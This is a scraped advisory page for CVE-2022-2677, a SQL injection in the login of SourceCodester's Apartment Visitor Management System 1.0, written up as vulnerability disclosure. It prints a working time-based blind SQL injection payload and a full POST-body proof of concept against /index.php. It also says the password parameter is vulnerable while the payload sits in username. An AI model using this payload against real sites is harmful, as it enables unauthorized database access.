Headline

CVE-2022-2677: CVE_demo/Apartment Visitor Management System-SQL injections.md at main · anx0ing/CVE_demo

A vulnerability was found in SourceCodester Apartment Visitor Management System 1.0. It has been classified as critical. This affects an unknown part of the file index.php. The manipulation of the argument username with the input ' AND (SELECT 4955 FROM (SELECT(SLEEP(5)))RSzF) AND 'htiy’=’htiy leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205665 was assigned to this vulnerability.

2 years ago

CVE

Open in Source

#sql #vulnerability #git #php #auth

Permalink

main

Switch branches/tags

Go to file

Go to file
Copy path
Copy permalink

Cannot retrieve contributors at this time

Apartment Visitor Management System-SQL injections Date: 2022-08/06 Exploit Author: [email protected] Vendor Homepage: Software Link: Version: 1.0 /index.php

43 lines (18 sloc) 642 Bytes

Raw Blame

Open in GitHub Desktop

Open with Desktop
View raw
Copy raw contents
View blame

Apartment Visitor Management System-SQL injections****Date:

2022-08/06

Exploit Author:

[email protected]

Vendor Homepage:

https://www.sourcecodester.com

Software Link:

https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code

Version:

1.0

/index.php

passwordParameters have SQL injections

POC

login=&password=admin123&username=' AND (SELECT 4955 FROM (SELECT(SLEEP(5)))RSzF) AND 'htiy'='htiy

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago